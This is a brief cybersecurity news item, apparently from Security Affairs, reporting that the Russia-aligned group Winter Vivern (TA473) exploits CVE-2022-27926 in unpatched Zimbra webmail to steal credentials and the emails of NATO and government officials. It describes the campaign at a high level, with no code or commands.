A Russian hacking group, tracked as Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched Zimbra instances to gain access to the emails of NATO officials, governments, military personnel, and diplomats.
The CVE-2022-27926 flaw affects Zimbra Collaboration versions 9.0.0, which is used to host publicly facing webmail portals.
The attacker can also use the compromised accounts to carry out lateral phishing attacks and further infiltrate the target organizations
TA473’s cyber operations align with the support of Russian and/or Belarussian geopolitical goals.
These payloads allow actors to steal usernames, passwords, and store active session and CSRF tokens from cookies allowing the login to publicly facing vulnerable webmail portals belonging to target organizations.
The APT group uses scanning tools like Acunetix to identify unpatched webmail platforms used by target organizations.
The threat actors send phishing email from a compromised address, which is spoofed to appear as someone relevant to their organization.
Please vote for Security Affairs (https://securityaffairs.com/) as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections:
You can nominate yourself or your favourite blogger. We ask that you provide a brief paragraph of 250 words explaining why they should win.
Nominate here: https://docs.google.com/forms/d/e/1FAIpQLSfaFMkrMlrLhOBsRPKdv56Y4HgC88Bcji4V7OCxCm_OmyPoLw/viewform
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, NATO)